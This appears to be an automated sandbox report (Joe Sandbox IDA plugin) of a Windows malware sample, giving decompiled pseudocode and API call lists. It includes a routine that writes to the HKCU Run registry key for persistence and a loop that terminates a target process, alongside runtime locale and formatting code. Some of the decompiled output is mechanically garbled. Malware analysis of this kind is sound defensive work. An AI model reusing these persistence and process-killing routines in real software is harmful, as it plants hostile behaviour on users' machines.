    						E00403EDC(_t122, _t124);
    					} else {
    						while(_t92 <= E00404148(_t124)) {
    							_t83 =  *(_t124 + _t92 - 1) - 0x47;
    							__eflags = _t83;
    							if(_t83 != 0) {
    								__eflags = _t83 != 0x20;
    								if(_t83 != 0x20) {
    									E00404070();
    									E00404150(_t122, _v16);
    								}
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						}
    					}
    				}
    				L28:
    				_pop(_t111);
    				 *[fs:eax] = _t111;
    				_push(E0040A2B9);
    				return E00403EAC( &_v24, 4);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
    				char _v20;
    				intOrPtr _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				intOrPtr _v40;
    				char _v44;
    				char _v48;
    				void* _t22;
    				void* _t35;
    				intOrPtr* _t38;
    				void* _t47;
    
    				_t47 = __ecx;
    				_t38 = __edx;
    				E00403E88(__ecx);
    				if(_t38 == 0) {
    					return E00403EDC(_t47, "0.0.0.0");
    				}
    				if( *_t38 + 0xd0 - 0xa >= 0) {
    					_t22 = E00404348(_t38);
    					_push(_t22);
    					L0040C4F8();
    					if(_t22 != 0) {
    						_v48 = 0;
    						_v44 = 0;
    						_v40 = 0;
    						_v36 = 0;
    						_v32 = 0;
    						_v28 = 0;
    						_v24 = 0;
    						_v20 = 0;
    						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
    					}
    				} else {
    					_t35 = E00404348(_t38);
    					_push(_t35);
    					L0040C4C8();
    					_t22 = _t35 + 1;
    					if(_t22 != 0) {
    						return E00403EDC(_t47, _t38);
    					}
    				}
    				return _t22;
    			}

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
    				intOrPtr _v8;
    				char _v12;
    				void* _v16;
    				char _v20;
    				int _t28;
    				char* _t41;
    				intOrPtr _t47;
    				void* _t51;
    
    				_v20 = 0;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t51);
    				_push(0x418692);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t51 + 0xfffffff0;
    				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
    				_t41 = E00404348(_v12);
    				E00404080( &_v20, _t41);
    				_t28 = E00404148(_v20);
    				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
    				RegCloseKey(_v16);
    				_pop(_t47);
    				 *[fs:eax] = _t47;
    				_push(E00418699);
    				E00403E88( &_v20);
    				return E00403EAC( &_v12, 2);
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    C-Code - Quality: 72%
    			E00418B04() {
    				char _v8;
    				intOrPtr* _t3;
    				long _t13;
    				void* _t20;
    				void* _t21;
    				intOrPtr _t24;
    				void* _t26;
    
    				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
    				_push(0);
    				_t26 = 0;
    				_push(_t24);
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t24;
    				L2:
    				E00403F20( &_v8,  *0x454a5c);
    				E00418A14(0x454a5c, _t20, _t21);
    				E00404294(_v8,  *0x454a5c);
    				if(_t26 != 0) {
    					_t26 = E00418560(_t26);
    					if(_t26 == 0) {
    						_t13 =  *0x454a60; // 0x0
    						TerminateProcess(OpenProcess(1, 0, _t13), 0);
    					}
    				}
    				Sleep("h N");
    				goto L2;
    			}

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    C-Code - Quality: 75%
    			E00418B0C() {
    				char _v8;
    				long _t10;
    				void* _t17;
    				void* _t18;
    				intOrPtr _t20;
    				void* _t21;
    
    				_push(0);
    				_t21 = 0;
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t20;
    				while(1) {
    					E00403F20( &_v8,  *0x454a5c);
    					E00418A14(0x454a5c, _t17, _t18);
    					E00404294(_v8,  *0x454a5c);
    					if(_t21 != 0) {
    						_t21 = E00418560(_t21);
    						if(_t21 == 0) {
    							_t10 =  *0x454a60; // 0x0
    							TerminateProcess(OpenProcess(1, 0, _t10), 0);
    						}
    					}
    					Sleep("h N");
    				}
    			}

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    C-Code - Quality: 100%
    			E0040BAA0() {
    				_Unknown_base(*)()* _t1;
    				struct HINSTANCE__* _t3;
    
    				_t1 = GetModuleHandleA("kernel32.dll");
    				_t3 = _t1;
    				if(_t3 != 0) {
    					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
    					 *0x41912c = _t1;
    				}
    				if( *0x41912c == 0) {
    					 *0x41912c = E004076D4;
    					return E004076D4;
    				}
    				return _t1;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
    				signed int _t166;
    				signed int _t168;
    				signed int _t170;
    				signed int _t172;
    				signed int _t181;
    				void* _t183;
    				intOrPtr _t224;
    				intOrPtr _t227;
    				signed int _t232;
    				void* _t250;
    				void* _t252;
    				intOrPtr _t272;
    				signed int _t281;
    				void* _t282;
    
    				L0:
    				while(1) {
    					L0:
    					E004089D8(_t282);
    					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
    					if(E004077C0(_t281, 5, 0x409418) != 0) {
    						_t166 = E004077C0(_t281, 3, 0x409420);
    						__eflags = _t166;
    						if(_t166 != 0) {
    							_t168 = E004077C0(_t281, 4, 0x409424);
    							__eflags = _t168;
    							if(_t168 != 0) {
    								_t170 = E004077C0(_t281, 4, 0x40942c);
    								__eflags = _t170;
    								if(_t170 != 0) {
    									_t172 = E004077C0(_t281, 3, 0x409434);
    									__eflags = _t172;
    									if(_t172 != 0) {
    										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									} else {
    										E004089A0(_t282);
    										_pop(_t250);
    										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
    										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    									}
    								} else {
    									E004089A0(_t282);
    									_pop(_t252);
    									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
    									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								}
    							} else {
    								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    								if( *((short*)(_t282 - 0x16)) >= 0xc) {
    									_t224 =  *0x454694; // 0x0
    									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
    								} else {
    									_t227 =  *0x454690; // 0x0
    									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
    								}
    								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								 *((char*)(_t282 - 0x1e)) = 1;
    							}
    						} else {
    							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    							if( *((short*)(_t282 - 0x16)) >= 0xc) {
    								__eflags = _t281;
    							}
    							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    							 *((char*)(_t282 - 0x1e)) = 1;
    						}
    					} else {
    						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
    						if( *((short*)(__ebp - 0x16)) >= 0xc) {
    							__esi = __esi + 3;
    							__eflags = __esi;
    						}
    						__eax =  *(__ebp + 8);
    						__edx = 2;
    						__eax = __esi;
    						__eax = E004088C4(2,  *(__ebp + 8));
    						 *(__ebp - 4) =  *(__ebp - 4) + 4;
    						 *((char*)(__ebp - 0x1e)) = 1;
    					}
    					while(1) {
    						L109:
    						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
    						if(_t164 == 0) {
    							break;
    						}
    						L1:
    						 *(_t282 - 5) = _t164;
    						asm("bt [0x419108], eax");
    						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t181 =  *(_t282 - 5);
    							__eflags = _t181 + 0x9f - 0x1a;
    							if(_t181 + 0x9f - 0x1a < 0) {
    								_t181 = _t181 - 0x20;
    								__eflags = _t181;
    							}
    							L5:
    							__eflags = _t181 + 0xbf - 0x1a;
    							if(_t181 + 0xbf - 0x1a >= 0) {
    								L10:
    								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
    								__eflags = _t183 - 0x38;
    								if(_t183 > 0x38) {
    									L108:
    									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									continue;
    								}
    								L11:
    								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
    									case 0:
    										goto L108;
    									case 1:
    										L12:
    										E00408974(_t282);
    										E004089A0(_t282);
    										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
    										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
    											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
    										} else {
    											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
    										}
    										goto L109;
    									case 2:
    										L15:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x24;
    										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
    										__eax =  *(__ebp - 0x24);
    										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 3:
    										L16:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x28;
    										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
    										__eax =  *(__ebp - 0x28);
    										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 4:
    										L17:
    										E00408974(__ebp) = E004089A0(__ebp);
    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										if(__eflags < 0) {
    											__eax =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x10) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
    												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
    											} else {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											}
    										}
    										goto L109;
    									case 5:
    										L23:
    										E00408974(__ebp) =  *(__ebp - 0xc);
    										__eax =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags = __eax;
    										if(__eflags < 0) {
    											E004089A0(__ebp) =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x12) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											} else {
    												__eax = __eax - 1;
    												__eflags = __eax;
    												if(__eflags == 0) {
    													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
    													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    												} else {
    													__eax = __eax - 1;
    													__eflags = __eax;
    													if(__eax == 0) {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454684; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													} else {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454688; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													}
    												}
    											}
    										}
    										goto L109;
    									case 6:
    										L33:
    										__eax = E00408974(__ebp);
    										__eax = E004089D8(__ebp);
    										 *(__ebp - 0x1f) = 0;
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L52:
    											__al =  *__esi;
    											__eflags =  *__esi;
    											if( *__esi == 0) {
    												break;
    											}
    											L34:
    											__eax = __eax & 0x000000ff;
    											__eflags = __eax;
    											asm("bt [0x419108], eax");
    											if(__eax >= 0) {
    												L36:
    												__eax = 0;
    												__al =  *__esi;
    												__eflags = 0 - 0x48;
    												if(0 > 0x48) {
    													L42:
    													__eax = 0xffffffffffffff9f;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														L45:
    														__eflags =  *(__ebp - 0x1f);
    														if( *(__ebp - 0x1f) != 0) {
    															L51:
    															__esi = __esi + 1;
    															__eflags = __esi;
    															continue;
    														}
    														L46:
    														__edx = 0x409418;
    														__ecx = 5;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 5, 0x409418);
    														__eflags = __eax;
    														if(__eax == 0) {
    															L49:
    															 *((char*)(__ebp - 0x1e)) = 1;
    															break;
    														}
    														L47:
    														__edx = 0x409420;
    														__ecx = 3;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 3, 0x409420);
    														__eflags = __eax;
    														if(__eax == 0) {
    															goto L49;
    														}
    														L48:
    														__edx = 0x409424;
    														__ecx = 4;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 4, 0x409424);
    														__eflags = __eax;
    														if(__eax != 0) {
    															break;
    														}
    														goto L49;
    													}
    													L43:
    													__eax = 0xffffffffffffff98;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														break;
    													}
    													L44:
    													goto L51;
    												}
    												L37:
    												if(0 == 0x48) {
    													break;
    												}
    												L38:
    												__eax = 0xffffffffffffffde;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													L50:
    													__al =  *(__ebp - 0x1f);
    													__al =  *(__ebp - 0x1f) ^ 0x00000001;
    													__eflags = __al;
    													 *(__ebp - 0x1f) = __al;
    													goto L51;
    												}
    												L39:
    												__eax = 0xffffffffffffffd9;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L50;
    												}
    												L40:
    												__eax = 0xffffffffffffffbf;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L45;
    												}
    												L41:
    												goto L51;
    											} else {
    												__eax = __esi;
    												__eax = E0040B044(__esi);
    												__esi = __eax;
    												continue;
    											}
    										}
    										L53:
    										__ax =  *((intOrPtr*)(__ebp - 0x16));
    										__eflags =  *((char*)(__ebp - 0x1e));
    										if( *((char*)(__ebp - 0x1e)) != 0) {
    											__eflags = __ax;
    											if(__ax != 0) {
    												__eflags = __ax - 0xc;
    												if(__ax > 0xc) {
    													__ax = __ax - 0xc;
    													__eflags = __ax;
    												}
    											} else {
    												__ax = 0xc;
    											}
    										}
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__edx =  *(__ebp + 8);
    										__eax = __ax & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 7:
    										L61:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x18) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 8:
    										L64:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 9:
    										L67:
    										__eax = E00408974(__ebp);
    										__eflags =  *(__ebp - 0xc) - 1;
    										if( *(__ebp - 0xc) != 1) {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										} else {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x454698; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										}
    										goto L109;
    									case 0xa:
    										L70:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 3;
    										if( *(__ebp - 0xc) > 3) {
    											 *(__ebp - 0xc) = 3;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 0xb:
    										goto L0;
    									case 0xc:
    										L90:
    										E00408974(__ebp) =  *(__ebp + 8);
    										__eax =  *0x454684; // 0x0
    										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										__eax = E004089D8(__ebp);
    										__eflags =  *((short*)(__ebp - 0x16));
    										if( *((short*)(__ebp - 0x16)) != 0) {
    											L93:
    											 *(__ebp + 8) = 0x409438;
    											__edx = 1;
    											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    											goto L109;
    										}
    										L91:
    										__eflags =  *(__ebp - 0x18);
    										if( *(__ebp - 0x18) != 0) {
    											goto L93;
    										}
    										L92:
    										__eflags =  *(__ebp - 0x1a);
    										if( *(__ebp - 0x1a) == 0) {
    											goto L109;
    										}
    										goto L93;
    									case 0xd:
    										L94:
    										__eflags =  *0x454681;
    										__eflags = __eax - 0x454681;
    										 *__edi =  *__edi + __cl;
    										__eflags =  *(__ecx - 0x75000000) & __bl;
    									case 0xe:
    										L97:
    										__eflags =  *0x45468c;
    										__eflags = __eax - 0x45468c;
    										_t136 = __edi + __esi * 2 - 0x75;
    										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
    										__eflags =  *_t136;
    									case 0xf:
    										L100:
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L104:
    											__eax =  *(__ebp - 4);
    											__al =  *__eax;
    											__eflags = __al;
    											if(__al == 0) {
    												break;
    											}
    											L105:
    											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
    											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
    												L101:
    												__eax = __eax & 0x000000ff;
    												__eflags = __eax;
    												asm("bt [0x419108], eax");
    												if(__eax >= 0) {
    													_t146 = __ebp - 4;
    													 *_t146 =  *(__ebp - 4) + 1;
    													__eflags =  *_t146;
    												} else {
    													__eax =  *(__ebp - 4);
    													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
    												}
    												continue;
    											}
    											break;
    										}
    										L106:
    										__eax =  *(__ebp + 8);
    										__edx =  *(__ebp - 4);
    										__edx =  *(__ebp - 4) - __esi;
    										__esi = E004088C4(__edx,  *(__ebp + 8));
    										__eax =  *(__ebp - 4);
    										__eflags =  *__eax;
    										if( *__eax != 0) {
    											 *(__ebp - 4) =  *(__ebp - 4) + 1;
    										}
    										goto L109;
    								}
    							} else {
    								__eflags = _t181 - 0x4d;
    								if(_t181 == 0x4d) {
    									__eflags = _t232 - 0x48;
    									if(_t232 == 0x48) {
    										_t181 = 0x4e;
    									}
    								}
    								L9:
    								_t232 = _t181;
    								goto L10;
    							}
    						} else {
    							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t232 = 0x20;
    							continue;
    						}
    					}
    					L110:
    					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
    					_pop(_t272);
    					 *[fs:eax] = _t272;
    					_push(E00409410);
    					return E00403EAC(_t282 - 0x28, 2);
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
    				char _v260;
    				char _v768;
    				char _v772;
    				intOrPtr* _v776;
    				signed short* _v780;
    				char _v784;
    				signed int _v788;
    				char _v792;
    				intOrPtr* _v796;
    				signed char _t43;
    				intOrPtr* _t60;
    				void* _t79;
    				void* _t81;
    				void* _t84;
    				void* _t85;
    				intOrPtr* _t92;
    				void* _t96;
    				char* _t97;
    				void* _t98;
    
    				_v776 = __eax;
    				if(( *(_v776 + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t43 =  *_v776;
    				if((_t43 & 0x00000fff) == 0xc) {
    					if((_t43 & 0x00000040) == 0) {
    						_v780 =  *((intOrPtr*)(_v776 + 8));
    					} else {
    						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
    					}
    					_v788 =  *_v780 & 0x0000ffff;
    					_t79 = _v788 - 1;
    					if(_t79 >= 0) {
    						_t85 = _t79 + 1;
    						_t96 = 0;
    						_t97 =  &_v772;
    						do {
    							_v796 = _t97;
    							_push(_v796 + 4);
    							_t22 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040C9FC();
    							E0040D7EC(_v780);
    							_push( &_v784);
    							_t25 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040CA04();
    							E0040D7EC(_v780);
    							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
    							_t96 = _t96 + 1;
    							_t97 = _t97 + 8;
    							_t85 = _t85 - 1;
    						} while (_t85 != 0);
    					}
    					_t81 = _v788 - 1;
    					if(_t81 >= 0) {
    						_t84 = _t81 + 1;
    						_t60 =  &_v768;
    						_t92 =  &_v260;
    						do {
    							 *_t92 =  *_t60;
    							_t92 = _t92 + 4;
    							_t60 = _t60 + 8;
    							_t84 = _t84 - 1;
    						} while (_t84 != 0);
    						do {
    							goto L12;
    						} while (E0040D8C4(_t83, _t98) != 0);
    						goto L15;
    					}
    					L12:
    					_t83 = _v788 - 1;
    					if(E0040D894(_v788 - 1, _t98) != 0) {
    						_push( &_v792);
    						_push( &_v260);
    						_push(_v780);
    						L0040CA0C();
    						E0040D7EC(_v780);
    						E0040DB18(_v792);
    					}
    				}
    				L15:
    				_push(_v776);
    				L0040C598();
    				return E0040D7EC(_v776);
    			}

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B3A0() {
    				char _v152;
    				short _v410;
    				signed short _t14;
    				signed int _t16;
    				int _t18;
    				void* _t20;
    				void* _t23;
    				int _t24;
    				int _t26;
    				signed int _t30;
    				signed int _t31;
    				signed int _t32;
    				signed int _t37;
    				int* _t39;
    				short* _t41;
    				void* _t49;
    
    				 *0x454738 = 0x409;
    				 *0x45473c = 9;
    				 *0x454740 = 1;
    				_t14 = GetThreadLocale();
    				if(_t14 != 0) {
    					 *0x454738 = _t14;
    				}
    				if(_t14 != 0) {
    					 *0x45473c = _t14 & 0x3ff;
    					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
    				}
    				memcpy(0x419108, 0x40b4f4, 8 << 2);
    				if( *0x4190c0 != 2) {
    					_t16 = GetSystemMetrics(0x4a);
    					__eflags = _t16;
    					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
    					_t18 = GetSystemMetrics(0x2a);
    					__eflags = _t18;
    					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
    					 *0x454744 = _t31;
    					__eflags = _t31;
    					if(__eflags != 0) {
    						return E0040B328(__eflags, _t49);
    					}
    				} else {
    					_t20 = E0040B388();
    					if(_t20 != 0) {
    						 *0x454745 = 0;
    						 *0x454744 = 0;
    						return _t20;
    					}
    					E0040B328(__eflags, _t49);
    					_t37 = 0x20;
    					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
    					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
    					 *0x454744 = _t32;
    					__eflags = _t32;
    					if(_t32 != 0) {
    						 *0x454745 = 0;
    						return _t23;
    					}
    					_t24 = 0x80;
    					_t39 =  &_v152;
    					do {
    						 *_t39 = _t24;
    						_t24 = _t24 + 1;
    						_t39 =  &(_t39[0]);
    						__eflags = _t24 - 0x100;
    					} while (_t24 != 0x100);
    					_t26 =  *0x454738; // 0x409
    					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
    					_t18 = 0x80;
    					_t41 =  &_v410;
    					while(1) {
    						__eflags =  *_t41 - 2;
    						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
    						 *0x454745 = _t37;
    						__eflags = _t37;
    						if(_t37 != 0) {
    							goto L17;
    						}
    						_t41 = _t41 + 2;
    						_t18 = _t18 - 1;
    						__eflags = _t18;
    						if(_t18 != 0) {
    							continue;
    						} else {
